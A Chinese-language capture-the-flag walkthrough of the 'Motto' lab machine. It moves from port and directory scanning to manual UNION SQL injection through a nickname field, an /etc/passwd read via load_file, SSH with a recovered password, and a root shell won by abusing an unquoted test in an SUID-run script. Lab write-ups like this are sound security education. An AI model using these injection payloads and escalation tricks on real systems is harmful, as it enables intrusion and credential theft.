MazeSec-Motto-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Password:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.157  08:00:27:ae:79:5f       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fc:db:36       VMware, Inc.
^C
❯ export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.60.157:22
Open 192.168.60.157:80
Open 192.168.60.157:9090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-24 23:06 CST
Initiating ARP Ping Scan at 23:06
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 23:06, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:06
Completed Parallel DNS resolution of 1 host. at 23:06, 0.85s elapsed
DNS resolution of 1 IPs took 0.85s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 23:06
Scanning 192.168.60.157 [3 ports]
Discovered open port 22/tcp on 192.168.60.157
Discovered open port 80/tcp on 192.168.60.157
Discovered open port 9090/tcp on 192.168.60.157
Completed SYN Stealth Scan at 23:06, 0.02s elapsed (3 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-08-24 23:06:48 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
9090/tcp open  zeus-admin syn-ack ttl 64
MAC Address: 08:00:27:AE:79:5F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.03 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.157
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 1908]
Progress: 237031 / 1102800 (21.49%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 237072 / 1102800 (21.50%)
===============================================================
Finished
===============================================================

只是一个单纯的小游戏，没有其他什么东西

枚举9090端口

❯ gobuster dir -u "http://$ip:9090" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.157:9090
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login                (Status: 200) [Size: 1304]
/register             (Status: 200) [Size: 1326]
/static               (Status: 301) [Size: 43] [--> /static/]
/myinfo               (Status: 200) [Size: 68]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

存在登录注册功能，尝试注册个用户

SQL注入

登录框可能存在SQL注入，尝试一下，好像不行

不过登录后的修改昵称功能，可以修改为任意用户包括已经存在用户

这个改成HYH即可在我的motto查看到HYH留言的信息

尝试注入' union select 1,2,group_concat(schema_name) from information_schema.schemata ; -- +

继续手工注入

' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() ; -- +

继续

' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database(); -- +

直接读取register_infos表中的password字段

' union select 1,2,password from register_infos ; -- +

得到疑似用户密码cannotforgetyou

利用sql注入还可以读文件，写shell之类的，总之操作很多

' union select 1,2,load_file('/etc/passwd'); -- +

用户提权

尝试利用此redbean用户加上之前拿到的密码ssh连接一下

❯ ssh redbean@$ip
redbean@192.168.60.157's password:
Linux motto 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 31 04:01:36 2025 from 192.168.56.103
redbean@motto:~$ id
uid=1000(redbean) gid=1000(redbean) groups=1000(redbean)
redbean@motto:~$ cat user.txt
flag{796f756765747265646265616e}

Root提权

发现/opt/run_newsh存在suid权限

redbean@motto:~$ find / -perm -u=s 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/run_newsh

尝试直接执行以下

好像最后会执行/opt/new.sh文件

redbean@motto:/opt$ ./run_newsh abc

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
 ● Module A status: OK (ver 1.15.140)
 ● Module B status: OK (ver 3.7.483)
 ● Module C status: OK (ver 4.16.368)
Random seed value: 1376
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
 → Executing test 1 of 3
 → Executing test 2 of 3
 → Executing test 3 of 3

Waiting period: 6 seconds
>> Waiting T-6 seconds...
>> Countdown: 5
>> Waiting T-4 seconds...
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
Diagnostics complete.
Thank you for using the system monitor.
[STATS] Summary Report:
    Processes checked: 33
/opt/new.sh: line 60: bc: command not found
    CPU load average:
    Uptime (hours): 70

但当前用户无法读取此文件，不过用户家目录中存在备份文件

Bash绕过

省略其他描述，精简就是bash绕过执行

redbean@motto:~$ cd .backup/
redbean@motto:~/.backup$ ls -al
total 16
drwxr-xr-x 2 root    root    4096 Jul 31 08:27 .
drwxr-xr-x 3 redbean redbean 4096 Jul 31 08:29 ..
-r--r--r-- 1 root    root    1709 Jul 31 02:46 new.sh
-rw-r--r-- 1 root    root     509 Jul 31 08:27 run_newsh.c
redbean@motto:~/.backup$ cat new.sh
#!/bin/bash
PATH=/usr/bin

…………………………

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

…………………………

当$1='flag '（注意flag后面有个空格）即绕过第二行命令，执行chmod这个命令

# 这是没加空格的，直接走exit2这个条件
redbean@motto:/opt$ ./run_newsh flag 

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
 ● Module A status: OK (ver 3.2.224)
 ● Module B status: OK (ver 5.7.163)
 ● Module C status: OK (ver 2.14.387)
Random seed value: 14915
[INFO] Evaluating input parameters...
redbean@motto:/opt$ echo $?
2
# 这是加了的
redbean@motto:/opt$ ./run_newsh 'flag '

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
 ● Module A status: OK (ver 3.18.143)
 ● Module B status: OK (ver 4.0.21)
 ● Module C status: OK (ver 5.18.427)
Random seed value: 4794
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
 → Executing test 1 of 3
 → Executing test 2 of 3
 → Executing test 3 of 3

Waiting period: 3 seconds
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
System stable.
Thank you for using the system monitor.
[STATS] Summary Report:
    Processes checked: 61
/opt/new.sh: line 60: bc: command not found
    CPU load average:
    Uptime (hours): 15
redbean@motto:/opt$ echo $?
0
redbean@motto:/opt$ bash -p
bash-5.0# whoami
root
bash-5.0# cat /root/root.txt
flag{796f75676574726f6f74627574796f7563616e6e6f74676574686572}